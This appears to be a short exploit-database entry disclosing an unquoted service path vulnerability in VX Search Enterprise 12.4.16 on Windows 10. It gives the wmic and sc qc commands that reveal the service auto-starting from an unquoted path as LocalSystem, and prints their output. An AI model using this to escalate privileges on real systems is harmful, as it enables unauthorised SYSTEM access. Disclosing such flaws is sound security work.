VX Search Enterprise version 12.4.16 suffers from an unquoted service path vulnerability.
bad007ee33d3f73b00330e852cb7c1bc
Exploit Title: VX Search Enterprise v12.4.16 (x86) - 'VX Search Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 02/10/2020
Vendor Homepage: http://www.vxsearch.com
Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)
C:\Users\goku>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
VX Search Enterprise C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe Auto
C:\Users\goku>sc qc "VX Search Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VX Search Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VX Search Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem